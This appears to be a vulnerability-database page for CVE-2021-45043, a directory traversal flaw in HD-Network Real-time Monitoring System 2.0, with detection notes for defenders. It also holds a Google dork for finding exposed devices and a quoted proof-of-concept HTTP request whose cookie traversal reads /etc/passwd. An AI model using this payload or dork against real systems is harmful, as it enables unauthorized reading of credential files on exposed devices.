CVE-2021-45043
published 2021-12-15CVE-2021-45043: HD-Network Real-time Monitoring System 2.0 allows ../ directory traversal to read /etc/shadow via the /language/lang s_Language parameter.
PriorityP266high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
EXPLOIT
EPSS
33.13%
98.2th percentile
HD-Network Real-time Monitoring System 2.0 allows ../ directory traversal to read /etc/shadow via the /language/lang s_Language parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hd-network_real-time_monitoring_system_project | hd-network_real-time_monitoring_system | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Exploit targets the `s_Language` cookie parameter with directory traversal sequences (../../) to read sensitive files such as /etc/passwd or /etc/shadow. Monitor HTTP requests to /language/lang with cookie values containing '../' sequences. ↗
- →Successful exploitation returns HTTP 200 with content matching 'root:.*:0:0:' in the response body, indicating /etc/passwd file disclosure. ↗
- →Identify exposed instances via Shodan or Google using the title fingerprint 'HD-Network Real-time Monitoring System V2.0'. ↗
- →The vulnerability is exploitable by unauthenticated remote attackers — no session or credentials are required. Any request to /language/lang with a traversal payload in the s_Language cookie should be treated as an active exploitation attempt. ↗
- ·The traversal payload depth in the s_Language cookie uses an excessive number of '../' sequences (15+), suggesting the application does not normalize or limit path traversal depth. Detection rules should match on any occurrence of '../' in the s_Language cookie, not just the exact depth shown in the PoC. ↗
- ·The NVD description references /etc/shadow as the target file, while the PoC uses /etc/passwd. Both sensitive files are reachable; detection and alerting should cover both targets. ↗
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
HD-Network Real-time Monitoring System 2.0 - Local File Inclusion (LFI)
exploitdb·2021-12-13
CVE-2021-45043 HD-Network Real-time Monitoring System 2.0 - Local File Inclusion (LFI)
HD-Network Real-time Monitoring System 2.0 - Local File Inclusion (LFI)
---
# Exploit Title: HD-Network Real-time Monitoring System 2.0 - Local File Inclusion (LFI)
# Google Dork: intitle:"HD-Network Real-time Monitoring System V2.0"
# Date: 11/12/2021
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: N/A
# Version: V2.0
# Tested on: Nginx NVRDVRIPC Web Server
Proof of Concept:
GET /language/lang HTTP/1.1
Referer: http://example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36
Cookie: s_asptitle=HD-Network%20Real-time%20Monitoring%20System%20V2.0; s_Language=../../../../../../../../../../../../../../etc/passwd; s_browsertype=2; s_ip=; s_port=; s_channum=; s_loginhandle=; s_httpport=; s_sn=;
Nuclei
HD-Network Realtime Monitoring System 2.0 - Local File Inclusion
nuclei·CVSS 7.5
CVE-2021-45043 [HIGH] HD-Network Realtime Monitoring System 2.0 - Local File Inclusion
HD-Network Realtime Monitoring System 2.0 - Local File Inclusion
Instances of HD-Network Realtime Monitoring System version 2.0 are vulnerable to a Local File Inclusion vulnerability which allows remote unauthenticated attackers to view confidential information.
Template:
id: CVE-2021-45043
info:
name: HD-Network Realtime Monitoring System 2.0 - Local File Inclusion
author: Momen Eldawakhly,Evan Rubinstein
severity: high
description: Instances of HD-Network Realtime Monitoring System version 2.0 are vulnerable to a Local File Inclusion vulnerability which allows remote unauthenticated attackers to view confidential information.
impact: |
An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored o
https://drive.google.com/file/d/1DlfZz0F8skWy3Mkahx_NMo-sYZh9-eun/view?usp=sharinghttps://drive.google.com/file/d/1bx9yCN-IHYuRpd7g3jhMb0LcTC1ARzSX/view?usp=sharinghttps://drive.google.com/file/d/1DlfZz0F8skWy3Mkahx_NMo-sYZh9-eun/view?usp=sharinghttps://drive.google.com/file/d/1bx9yCN-IHYuRpd7g3jhMb0LcTC1ARzSX/view?usp=sharing
2021-12-15
Published